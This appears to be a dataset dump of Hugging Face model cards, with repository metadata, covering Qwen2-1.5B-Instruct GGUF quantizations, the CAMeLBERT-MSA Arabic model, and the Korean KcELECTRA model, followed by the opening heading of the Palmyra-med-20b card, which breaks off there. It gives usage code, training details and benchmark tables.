Qwen2-1.5B-Instruct - GGUF
- Model creator: https://huggingface.co/Qwen/
- Original model: https://huggingface.co/Qwen/Qwen2-1.5B-Instruct/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Qwen2-1.5B-Instruct.Q2_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q2_K.gguf) | Q2_K | 0.63GB |
| [Qwen2-1.5B-Instruct.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ3_XS.gguf) | IQ3_XS | 0.68GB |
| [Qwen2-1.5B-Instruct.IQ3_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ3_S.gguf) | IQ3_S | 0.71GB |
| [Qwen2-1.5B-Instruct.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q3_K_S.gguf) | Q3_K_S | 0.71GB |
| [Qwen2-1.5B-Instruct.IQ3_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ3_M.gguf) | IQ3_M | 0.72GB |
| [Qwen2-1.5B-Instruct.Q3_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q3_K.gguf) | Q3_K | 0.77GB |
| [Qwen2-1.5B-Instruct.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q3_K_M.gguf) | Q3_K_M | 0.77GB |
| [Qwen2-1.5B-Instruct.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q3_K_L.gguf) | Q3_K_L | 0.82GB |
| [Qwen2-1.5B-Instruct.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ4_XS.gguf) | IQ4_XS | 0.84GB |
| [Qwen2-1.5B-Instruct.Q4_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_0.gguf) | Q4_0 | 0.87GB |
| [Qwen2-1.5B-Instruct.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.IQ4_NL.gguf) | IQ4_NL | 0.88GB |
| [Qwen2-1.5B-Instruct.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_K_S.gguf) | Q4_K_S | 0.88GB |
| [Qwen2-1.5B-Instruct.Q4_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_K.gguf) | Q4_K | 0.92GB |
| [Qwen2-1.5B-Instruct.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_K_M.gguf) | Q4_K_M | 0.92GB |
| [Qwen2-1.5B-Instruct.Q4_1.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q4_1.gguf) | Q4_1 | 0.95GB |
| [Qwen2-1.5B-Instruct.Q5_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_0.gguf) | Q5_0 | 1.02GB |
| [Qwen2-1.5B-Instruct.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_K_S.gguf) | Q5_K_S | 1.02GB |
| [Qwen2-1.5B-Instruct.Q5_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_K.gguf) | Q5_K | 1.05GB |
| [Qwen2-1.5B-Instruct.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_K_M.gguf) | Q5_K_M | 1.05GB |
| [Qwen2-1.5B-Instruct.Q5_1.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q5_1.gguf) | Q5_1 | 1.1GB |
| [Qwen2-1.5B-Instruct.Q6_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q6_K.gguf) | Q6_K | 1.19GB |
| [Qwen2-1.5B-Instruct.Q8_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf/blob/main/Qwen2-1.5B-Instruct.Q8_0.gguf) | Q8_0 | 1.53GB |
Original model description:
---
license: apache-2.0
language:
- en
pipeline_tag: text-generation
tags:
- chat
---
# Qwen2-1.5B-Instruct
## Introduction
Qwen2 is the new series of Qwen large language models. For Qwen2, we release a number of base language models and instruction-tuned language models ranging from 0.5 to 72 billion parameters, including a Mixture-of-Experts model. This repo contains the instruction-tuned 1.5B Qwen2 model.
Compared with the state-of-the-art opensource language models, including the previous released Qwen1.5, Qwen2 has generally surpassed most opensource models and demonstrated competitiveness against proprietary models across a series of benchmarks targeting for language understanding, language generation, multilingual capability, coding, mathematics, reasoning, etc.
For more details, please refer to our [blog](https://qwenlm.github.io/blog/qwen2/), [GitHub](https://github.com/QwenLM/Qwen2), and [Documentation](https://qwen.readthedocs.io/en/latest/).
<br>
## Model Details
Qwen2 is a language model series including decoder language models of different model sizes. For each size, we release the base language model and the aligned chat model. It is based on the Transformer architecture with SwiGLU activation, attention QKV bias, group query attention, etc. Additionally, we have an improved tokenizer adaptive to multiple natural languages and codes.
## Training details
We pretrained the models with a large amount of data, and we post-trained the models with both supervised finetuning and direct preference optimization.
## Requirements
The code of Qwen2 has been in the latest Hugging face transformers and we advise you to install `transformers>=4.37.0`, or you might encounter the following error:
```
KeyError: 'qwen2'
```
## Quickstart
Here provides a code snippet with `apply_chat_template` to show you how to load the tokenizer and model and how to generate contents.
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
device = "cuda" # the device to load the model onto
model = AutoModelForCausalLM.from_pretrained(
"Qwen/Qwen2-1.5B-Instruct",
torch_dtype="auto",
device_map="auto"
)
tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-1.5B-Instruct")
prompt = "Give me a short introduction to large language model."
messages = [
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": prompt}
]
text = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
model_inputs = tokenizer([text], return_tensors="pt").to(device)
generated_ids = model.generate(
model_inputs.input_ids,
max_new_tokens=512
)
generated_ids = [
output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
]
response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
```
## Evaluation
We briefly compare Qwen2-1.5B-Instruct with Qwen1.5-1.8B-Chat. The results are as follows:
| Datasets | Qwen1.5-0.5B-Chat | **Qwen2-0.5B-Instruct** | Qwen1.5-1.8B-Chat | **Qwen2-1.5B-Instruct** |
| :--- | :---: | :---: | :---: | :---: |
| MMLU | 35.0 | **37.9** | 43.7 | **52.4** |
| HumanEval | 9.1 | **17.1** | 25.0 | **37.8** |
| GSM8K | 11.3 | **40.1** | 35.3 | **61.6** |
| C-Eval | 37.2 | **45.2** | 55.3 | **63.8** |
| IFEval (Prompt Strict-Acc.) | 14.6 | **20.0** | 16.8 | **29.0** |
## Citation
If you find our work helpful, feel free to give us a cite.
```
@article{qwen2,
title={Qwen2 Technical Report},
year={2024}
}
```
|
CAMeL-Lab/bert-base-arabic-camelbert-msa | CAMeL-Lab | "2021-09-14T14:33:41Z" | 3,661 | 9 | transformers | [
"transformers",
"pytorch",
"tf",
"jax",
"bert",
"fill-mask",
"ar",
"arxiv:2103.06678",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:04Z" | ---
language:
- ar
license: apache-2.0
widget:
- text: "الهدف من الحياة هو [MASK] ."
---
# CAMeLBERT: A collection of pre-trained models for Arabic NLP tasks
## Model description
**CAMeLBERT** is a collection of BERT models pre-trained on Arabic texts with different sizes and variants.
We release pre-trained language models for Modern Standard Arabic (MSA), dialectal Arabic (DA), and classical Arabic (CA), in addition to a model pre-trained on a mix of the three.
We also provide additional models that are pre-trained on a scaled-down set of the MSA variant (half, quarter, eighth, and sixteenth).
The details are described in the paper *"[The Interplay of Variant, Size, and Task Type in Arabic Pre-trained Language Models](https://arxiv.org/abs/2103.06678)."*
This model card describes **CAMeLBERT-MSA** (`bert-base-arabic-camelbert-msa`), a model pre-trained on the entire MSA dataset.
||Model|Variant|Size|#Word|
|-|-|:-:|-:|-:|
||`bert-base-arabic-camelbert-mix`|CA,DA,MSA|167GB|17.3B|
||`bert-base-arabic-camelbert-ca`|CA|6GB|847M|
||`bert-base-arabic-camelbert-da`|DA|54GB|5.8B|
|✔|`bert-base-arabic-camelbert-msa`|MSA|107GB|12.6B|
||`bert-base-arabic-camelbert-msa-half`|MSA|53GB|6.3B|
||`bert-base-arabic-camelbert-msa-quarter`|MSA|27GB|3.1B|
||`bert-base-arabic-camelbert-msa-eighth`|MSA|14GB|1.6B|
||`bert-base-arabic-camelbert-msa-sixteenth`|MSA|6GB|746M|
## Intended uses
You can use the released model for either masked language modeling or next sentence prediction.
However, it is mostly intended to be fine-tuned on an NLP task, such as NER, POS tagging, sentiment analysis, dialect identification, and poetry classification.
We release our fine-tuninig code [here](https://github.com/CAMeL-Lab/CAMeLBERT).
#### How to use
You can use this model directly with a pipeline for masked language modeling:
```python
>>> from transformers import pipeline
>>> unmasker = pipeline('fill-mask', model='CAMeL-Lab/bert-base-arabic-camelbert-msa')
>>> unmasker("الهدف من الحياة هو [MASK] .")
[{'sequence': '[CLS] الهدف من الحياة هو العمل. [SEP]',
'score': 0.08507660031318665,
'token': 2854,
'token_str': 'العمل'},
{'sequence': '[CLS] الهدف من الحياة هو الحياة. [SEP]',
'score': 0.058905381709337234,
'token': 3696, 'token_str': 'الحياة'},
{'sequence': '[CLS] الهدف من الحياة هو النجاح. [SEP]',
'score': 0.04660581797361374, 'token': 6232,
'token_str': 'النجاح'},
{'sequence': '[CLS] الهدف من الحياة هو الربح. [SEP]',
'score': 0.04156001657247543,
'token': 12413, 'token_str': 'الربح'},
{'sequence': '[CLS] الهدف من الحياة هو الحب. [SEP]',
'score': 0.03534102067351341,
'token': 3088,
'token_str': 'الحب'}]
```
*Note*: to download our models, you would need `transformers>=3.5.0`. Otherwise, you could download the models manually.
Here is how to use this model to get the features of a given text in PyTorch:
```python
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-msa')
model = AutoModel.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-msa')
text = "مرحبا يا عالم."
encoded_input = tokenizer(text, return_tensors='pt')
output = model(**encoded_input)
```
and in TensorFlow:
```python
from transformers import AutoTokenizer, TFAutoModel
tokenizer = AutoTokenizer.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-msa')
model = TFAutoModel.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-msa')
text = "مرحبا يا عالم."
encoded_input = tokenizer(text, return_tensors='tf')
output = model(encoded_input)
```
## Training data
- MSA (Modern Standard Arabic)
- [The Arabic Gigaword Fifth Edition](https://catalog.ldc.upenn.edu/LDC2011T11)
- [Abu El-Khair Corpus](http://www.abuelkhair.net/index.php/en/arabic/abu-el-khair-corpus)
- [OSIAN corpus](https://vlo.clarin.eu/search;jsessionid=31066390B2C9E8C6304845BA79869AC1?1&q=osian)
- [Arabic Wikipedia](https://archive.org/details/arwiki-20190201)
- The unshuffled version of the Arabic [OSCAR corpus](https://oscar-corpus.com/)
## Training procedure
We use [the original implementation](https://github.com/google-research/bert) released by Google for pre-training.
We follow the original English BERT model's hyperparameters for pre-training, unless otherwise specified.
### Preprocessing
- After extracting the raw text from each corpus, we apply the following pre-processing.
- We first remove invalid characters and normalize white spaces using the utilities provided by [the original BERT implementation](https://github.com/google-research/bert/blob/eedf5716ce1268e56f0a50264a88cafad334ac61/tokenization.py#L286-L297).
- We also remove lines without any Arabic characters.
- We then remove diacritics and kashida using [CAMeL Tools](https://github.com/CAMeL-Lab/camel_tools).
- Finally, we split each line into sentences with a heuristics-based sentence segmenter.
- We train a WordPiece tokenizer on the entire dataset (167 GB text) with a vocabulary size of 30,000 using [HuggingFace's tokenizers](https://github.com/huggingface/tokenizers).
- We do not lowercase letters nor strip accents.
### Pre-training
- The model was trained on a single cloud TPU (`v3-8`) for one million steps in total.
- The first 90,000 steps were trained with a batch size of 1,024 and the rest was trained with a batch size of 256.
- The sequence length was limited to 128 tokens for 90% of the steps and 512 for the remaining 10%.
- We use whole word masking and a duplicate factor of 10.
- We set max predictions per sequence to 20 for the dataset with max sequence length of 128 tokens and 80 for the dataset with max sequence length of 512 tokens.
- We use a random seed of 12345, masked language model probability of 0.15, and short sequence probability of 0.1.
- The optimizer used is Adam with a learning rate of 1e-4, \\(\beta_{1} = 0.9\\) and \\(\beta_{2} = 0.999\\), a weight decay of 0.01, learning rate warmup for 10,000 steps and linear decay of the learning rate after.
## Evaluation results
- We evaluate our pre-trained language models on five NLP tasks: NER, POS tagging, sentiment analysis, dialect identification, and poetry classification.
- We fine-tune and evaluate the models using 12 dataset.
- We used Hugging Face's transformers to fine-tune our CAMeLBERT models.
- We used transformers `v3.1.0` along with PyTorch `v1.5.1`.
- The fine-tuning was done by adding a fully connected linear layer to the last hidden state.
- We use \\(F_{1}\\) score as a metric for all tasks.
- Code used for fine-tuning is available [here](https://github.com/CAMeL-Lab/CAMeLBERT).
### Results
| Task | Dataset | Variant | Mix | CA | DA | MSA | MSA-1/2 | MSA-1/4 | MSA-1/8 | MSA-1/16 |
| -------------------- | --------------- | ------- | ----- | ----- | ----- | ----- | ------- | ------- | ------- | -------- |
| NER | ANERcorp | MSA | 80.8% | 67.9% | 74.1% | 82.4% | 82.0% | 82.1% | 82.6% | 80.8% |
| POS | PATB (MSA) | MSA | 98.1% | 97.8% | 97.7% | 98.3% | 98.2% | 98.3% | 98.2% | 98.2% |
| | ARZTB (EGY) | DA | 93.6% | 92.3% | 92.7% | 93.6% | 93.6% | 93.7% | 93.6% | 93.6% |
| | Gumar (GLF) | DA | 97.3% | 97.7% | 97.9% | 97.9% | 97.9% | 97.9% | 97.9% | 97.9% |
| SA | ASTD | MSA | 76.3% | 69.4% | 74.6% | 76.9% | 76.0% | 76.8% | 76.7% | 75.3% |
| | ArSAS | MSA | 92.7% | 89.4% | 91.8% | 93.0% | 92.6% | 92.5% | 92.5% | 92.3% |
| | SemEval | MSA | 69.0% | 58.5% | 68.4% | 72.1% | 70.7% | 72.8% | 71.6% | 71.2% |
| DID | MADAR-26 | DA | 62.9% | 61.9% | 61.8% | 62.6% | 62.0% | 62.8% | 62.0% | 62.2% |
| | MADAR-6 | DA | 92.5% | 91.5% | 92.2% | 91.9% | 91.8% | 92.2% | 92.1% | 92.0% |
| | MADAR-Twitter-5 | MSA | 75.7% | 71.4% | 74.2% | 77.6% | 78.5% | 77.3% | 77.7% | 76.2% |
| | NADI | DA | 24.7% | 17.3% | 20.1% | 24.9% | 24.6% | 24.6% | 24.9% | 23.8% |
| Poetry | APCD | CA | 79.8% | 80.9% | 79.6% | 79.7% | 79.9% | 80.0% | 79.7% | 79.8% |
### Results (Average)
| | Variant | Mix | CA | DA | MSA | MSA-1/2 | MSA-1/4 | MSA-1/8 | MSA-1/16 |
| -------------------- | ------- | ----- | ----- | ----- | ----- | ------- | ------- | ------- | -------- |
| Variant-wise-average<sup>[[1]](#footnote-1)</sup> | MSA | 82.1% | 75.7% | 80.1% | 83.4% | 83.0% | 83.3% | 83.2% | 82.3% |
| | DA | 74.4% | 72.1% | 72.9% | 74.2% | 74.0% | 74.3% | 74.1% | 73.9% |
| | CA | 79.8% | 80.9% | 79.6% | 79.7% | 79.9% | 80.0% | 79.7% | 79.8% |
| Macro-Average | ALL | 78.7% | 74.7% | 77.1% | 79.2% | 79.0% | 79.2% | 79.1% | 78.6% |
<a name="footnote-1">[1]</a>: Variant-wise-average refers to average over a group of tasks in the same language variant.
## Acknowledgements
This research was supported with Cloud TPUs from Google’s TensorFlow Research Cloud (TFRC).
## Citation
```bibtex
@inproceedings{inoue-etal-2021-interplay,
title = "The Interplay of Variant, Size, and Task Type in {A}rabic Pre-trained Language Models",
author = "Inoue, Go and
Alhafni, Bashar and
Baimukan, Nurpeiis and
Bouamor, Houda and
Habash, Nizar",
booktitle = "Proceedings of the Sixth Arabic Natural Language Processing Workshop",
month = apr,
year = "2021",
address = "Kyiv, Ukraine (Online)",
publisher = "Association for Computational Linguistics",
abstract = "In this paper, we explore the effects of language variants, data sizes, and fine-tuning task types in Arabic pre-trained language models. To do so, we build three pre-trained language models across three variants of Arabic: Modern Standard Arabic (MSA), dialectal Arabic, and classical Arabic, in addition to a fourth language model which is pre-trained on a mix of the three. We also examine the importance of pre-training data size by building additional models that are pre-trained on a scaled-down set of the MSA variant. We compare our different models to each other, as well as to eight publicly available models by fine-tuning them on five NLP tasks spanning 12 datasets. Our results suggest that the variant proximity of pre-training data to fine-tuning data is more important than the pre-training data size. We exploit this insight in defining an optimized system selection model for the studied tasks.",
}
```
|
beomi/KcELECTRA-base | beomi | "2024-05-23T13:26:43Z" | 3,661 | 24 | transformers | [
"transformers",
"pytorch",
"safetensors",
"electra",
"pretraining",
"korean",
"ko",
"en",
"doi:10.57967/hf/0017",
"license:mit",
"endpoints_compatible",
"region:us"
] | null | "2022-03-02T23:29:05Z" | ---
language:
- ko
- en
tags:
- electra
- korean
license: "mit"
---
# KcELECTRA: Korean comments ELECTRA
** Updates on 2022.10.08 **
- KcELECTRA-base-v2022 (구 v2022-dev) 모델 이름이 변경되었습니다. --> KcELECTRA-base 레포의 `v2022`로 통합되었습니다.
- 위 모델의 세부 스코어를 추가하였습니다.
- 기존 KcELECTRA-base(v2021) 대비 대부분의 downstream task에서 ~1%p 수준의 성능 향상이 있습니다.
---
공개된 한국어 Transformer 계열 모델들은 대부분 한국어 위키, 뉴스 기사, 책 등 잘 정제된 데이터를 기반으로 학습한 모델입니다. 한편, 실제로 NSMC와 같은 User-Generated Noisy text domain 데이터셋은 정제되지 않았고 구어체 특징에 신조어가 많으며, 오탈자 등 공식적인 글쓰기에서 나타나지 않는 표현들이 빈번하게 등장합니다.
KcELECTRA는 위와 같은 특성의 데이터셋에 적용하기 위해, 네이버 뉴스에서 댓글과 대댓글을 수집해, 토크나이저와 ELECTRA모델을 처음부터 학습한 Pretrained ELECTRA 모델입니다.
기존 KcBERT 대비 데이터셋 증가 및 vocab 확장을 통해 상당한 수준으로 성능이 향상되었습니다.
KcELECTRA는 Huggingface의 Transformers 라이브러리를 통해 간편히 불러와 사용할 수 있습니다. (별도의 파일 다운로드가 필요하지 않습니다.)
```
💡 NOTE 💡
General Corpus로 학습한 KoELECTRA가 보편적인 task에서는 성능이 더 잘 나올 가능성이 높습니다.
KcBERT/KcELECTRA는 User genrated, Noisy text에 대해서 보다 잘 동작하는 PLM입니다.
```
## KcELECTRA Performance
- Finetune 코드는 https://github.com/Beomi/KcBERT-finetune 에서 찾아보실 수 있습니다.
- 해당 Repo의 각 Checkpoint 폴더에서 Step별 세부 스코어를 확인하실 수 있습니다.
| | Size<br/>(용량) | **NSMC**<br/>(acc) | **Naver NER**<br/>(F1) | **PAWS**<br/>(acc) | **KorNLI**<br/>(acc) | **KorSTS**<br/>(spearman) | **Question Pair**<br/>(acc) | **KorQuaD (Dev)**<br/>(EM/F1) |
| :----------------- | :-------------: | :----------------: | :--------------------: | :----------------: | :------------------: | :-----------------------: | :-------------------------: | :---------------------------: |
| **KcELECTRA-base-v2022** | 475M | **91.97** | 87.35 | 76.50 | 82.12 | 83.67 | 95.12 | 69.00 / 90.40 |
| **KcELECTRA-base** | 475M | 91.71 | 86.90 | 74.80 | 81.65 | 82.65 | **95.78** | 70.60 / 90.11 |
| KcBERT-Base | 417M | 89.62 | 84.34 | 66.95 | 74.85 | 75.57 | 93.93 | 60.25 / 84.39 |
| KcBERT-Large | 1.2G | 90.68 | 85.53 | 70.15 | 76.99 | 77.49 | 94.06 | 62.16 / 86.64 |
| KoBERT | 351M | 89.63 | 86.11 | 80.65 | 79.00 | 79.64 | 93.93 | 52.81 / 80.27 |
| XLM-Roberta-Base | 1.03G | 89.49 | 86.26 | 82.95 | 79.92 | 79.09 | 93.53 | 64.70 / 88.94 |
| HanBERT | 614M | 90.16 | 87.31 | 82.40 | 80.89 | 83.33 | 94.19 | 78.74 / 92.02 |
| KoELECTRA-Base | 423M | 90.21 | 86.87 | 81.90 | 80.85 | 83.21 | 94.20 | 61.10 / 89.59 |
| KoELECTRA-Base-v2 | 423M | 89.70 | 87.02 | 83.90 | 80.61 | 84.30 | 94.72 | 84.34 / 92.58 |
| KoELECTRA-Base-v3 | 423M | 90.63 | **88.11** | **84.45** | **82.24** | **85.53** | 95.25 | **84.83 / 93.45** |
| DistilKoBERT | 108M | 88.41 | 84.13 | 62.55 | 70.55 | 73.21 | 92.48 | 54.12 / 77.80 |
\*HanBERT의 Size는 Bert Model과 Tokenizer DB를 합친 것입니다.
\***config의 세팅을 그대로 하여 돌린 결과이며, hyperparameter tuning을 추가적으로 할 시 더 좋은 성능이 나올 수 있습니다.**
## How to use
### Requirements
- `pytorch ~= 1.8.0`
- `transformers ~= 4.11.3`
- `emoji ~= 0.6.0`
- `soynlp ~= 0.0.493`
### Default usage
```python
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained("beomi/KcELECTRA-base")
model = AutoModel.from_pretrained("beomi/KcELECTRA-base")
```
> 💡 이전 KcBERT 관련 코드들에서 `AutoTokenizer`, `AutoModel` 을 사용한 경우 `.from_pretrained("beomi/kcbert-base")` 부분을 `.from_pretrained("beomi/KcELECTRA-base")` 로만 변경해주시면 즉시 사용이 가능합니다.
### Pretrain & Finetune Colab 링크 모음
#### Pretrain Data
- KcBERT학습에 사용한 데이터 + 이후 2021.03월 초까지 수집한 댓글
- 약 17GB
- 댓글-대댓글을 묶은 기반으로 Document 구성
#### Pretrain Code
- https://github.com/KLUE-benchmark/KLUE-ELECTRA Repo를 통한 Pretrain
#### Finetune Code
- https://github.com/Beomi/KcBERT-finetune Repo를 통한 Finetune 및 스코어 비교
#### Finetune Samples
- NSMC with PyTorch-Lightning 1.3.0, GPU, Colab <a href="https://colab.research.google.com/drive/1Hh63kIBAiBw3Hho--BvfdUWLu-ysMFF0?usp=sharing">
<img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/>
</a>
## Train Data & Preprocessing
### Raw Data
학습 데이터는 2019.01.01 ~ 2021.03.09 사이에 작성된 **댓글 많은 뉴스/혹은 전체 뉴스** 기사들의 **댓글과 대댓글**을 모두 수집한 데이터입니다.
데이터 사이즈는 텍스트만 추출시 **약 17.3GB이며, 1억8천만개 이상의 문장**으로 이뤄져 있습니다.
> KcBERT는 2019.01-2020.06의 텍스트로, 정제 후 약 9천만개 문장으로 학습을 진행했습니다.
### Preprocessing
PLM 학습을 위해서 전처리를 진행한 과정은 다음과 같습니다.
1. 한글 및 영어, 특수문자, 그리고 이모지(🥳)까지!
정규표현식을 통해 한글, 영어, 특수문자를 포함해 Emoji까지 학습 대상에 포함했습니다.
한편, 한글 범위를 `ㄱ-ㅎ가-힣` 으로 지정해 `ㄱ-힣` 내의 한자를 제외했습니다.
2. 댓글 내 중복 문자열 축약
`ㅋㅋㅋㅋㅋ`와 같이 중복된 글자를 `ㅋㅋ`와 같은 것으로 합쳤습니다.
3. Cased Model
KcBERT는 영문에 대해서는 대소문자를 유지하는 Cased model입니다.
4. 글자 단위 10글자 이하 제거
10글자 미만의 텍스트는 단일 단어로 이뤄진 경우가 많아 해당 부분을 제외했습니다.
5. 중복 제거
중복적으로 쓰인 댓글을 제거하기 위해 완전히 일치하는 중복 댓글을 하나로 합쳤습니다.
6. `OOO` 제거
네이버 댓글의 경우, 비속어는 자체 필터링을 통해 `OOO` 로 표시합니다. 이 부분을 공백으로 제거하였습니다.
아래 명령어로 pip로 설치한 뒤, 아래 clean함수로 클리닝을 하면 Downstream task에서 보다 성능이 좋아집니다. (`[UNK]` 감소)
```bash
pip install soynlp emoji
```
아래 `clean` 함수를 Text data에 사용해주세요.
```python
import re
import emoji
from soynlp.normalizer import repeat_normalize
emojis = ''.join(emoji.UNICODE_EMOJI.keys())
pattern = re.compile(f'[^ .,?!/@$%~%·∼()\x00-\x7Fㄱ-ㅣ가-힣{emojis}]+')
url_pattern = re.compile(
r'https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)')
import re
import emoji
from soynlp.normalizer import repeat_normalize
pattern = re.compile(f'[^ .,?!/@$%~%·∼()\x00-\x7Fㄱ-ㅣ가-힣]+')
url_pattern = re.compile(
r'https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)')
def clean(x):
x = pattern.sub(' ', x)
x = emoji.replace_emoji(x, replace='') #emoji 삭제
x = url_pattern.sub('', x)
x = x.strip()
x = repeat_normalize(x, num_repeats=2)
return x
```
> 💡 Finetune Score에서는 위 `clean` 함수를 적용하지 않았습니다.
### Cleaned Data
- KcBERT 외 추가 데이터는 정리 후 공개 예정입니다.
## Tokenizer, Model Train
Tokenizer는 Huggingface의 [Tokenizers](https://github.com/huggingface/tokenizers) 라이브러리를 통해 학습을 진행했습니다.
그 중 `BertWordPieceTokenizer` 를 이용해 학습을 진행했고, Vocab Size는 `30000`으로 진행했습니다.
Tokenizer를 학습하는 것에는 전체 데이터를 통해 학습을 진행했고, 모델의 General Downstream task에 대응하기 위해 KoELECTRA에서 사용한 Vocab을 겹치지 않는 부분을 추가로 넣어주었습니다. (실제로 두 모델이 겹치는 부분은 약 5000토큰이었습니다.)
TPU `v3-8` 을 이용해 약 10일 학습을 진행했고, 현재 Huggingface에 공개된 모델은 848k step을 학습한 모델 weight가 업로드 되어있습니다.
(100k step별 Checkpoint를 통해 성능 평가를 진행하였습니다. 해당 부분은 `KcBERT-finetune` repo를 참고해주세요.)
모델 학습 Loss는 Step에 따라 초기 100-200k 사이에 급격히 Loss가 줄어들다 학습 종료까지도 지속적으로 loss가 감소하는 것을 볼 수 있습니다.

### KcELECTRA Pretrain Step별 Downstream task 성능 비교
> 💡 아래 표는 전체 ckpt가 아닌 일부에 대해서만 테스트를 진행한 결과입니다.

- 위와 같이 KcBERT-base, KcBERT-large 대비 **모든 데이터셋에 대해** KcELECTRA-base가 더 높은 성능을 보입니다.
- KcELECTRA pretrain에서도 Train step이 늘어감에 따라 점진적으로 성능이 향상되는 것을 볼 수 있습니다.
## 인용표기/Citation
KcELECTRA를 인용하실 때는 아래 양식을 통해 인용해주세요.
```
@misc{lee2021kcelectra,
author = {Junbum Lee},
title = {KcELECTRA: Korean comments ELECTRA},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/Beomi/KcELECTRA}}
}
```
논문을 통한 사용 외에는 MIT 라이센스를 표기해주세요. ☺️
## Acknowledgement
KcELECTRA Model을 학습하는 GCP/TPU 환경은 [TFRC](https://www.tensorflow.org/tfrc?hl=ko) 프로그램의 지원을 받았습니다.
모델 학습 과정에서 많은 조언을 주신 [Monologg](https://github.com/monologg/) 님 감사합니다 :)
## Reference
### Github Repos
- [KcBERT by Beomi](https://github.com/Beomi/KcBERT)
- [BERT by Google](https://github.com/google-research/bert)
- [KoBERT by SKT](https://github.com/SKTBrain/KoBERT)
- [KoELECTRA by Monologg](https://github.com/monologg/KoELECTRA/)
- [Transformers by Huggingface](https://github.com/huggingface/transformers)
- [Tokenizers by Hugginface](https://github.com/huggingface/tokenizers)
- [ELECTRA train code by KLUE](https://github.com/KLUE-benchmark/KLUE-ELECTRA)
### Blogs
- [Monologg님의 KoELECTRA 학습기](https://monologg.kr/categories/NLP/ELECTRA/)
- [Colab에서 TPU로 BERT 처음부터 학습시키기 - Tensorflow/Google ver.](https://beomi.github.io/2020/02/26/Train-BERT-from-scratch-on-colab-TPU-Tensorflow-ver/)
|
Writer/palmyra-med-20b | Writer | "2023-12-21T17:27:54Z" | 3,661 | 31 | transformers | [
"transformers",
"pytorch",
"gpt2",
"text-generation",
"medical",
"palmyra",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-06-29T12:56:09Z" | ---
license: apache-2.0
language:
- en
tags:
- medical
- palmyra
---
# Palmyra-med-20b
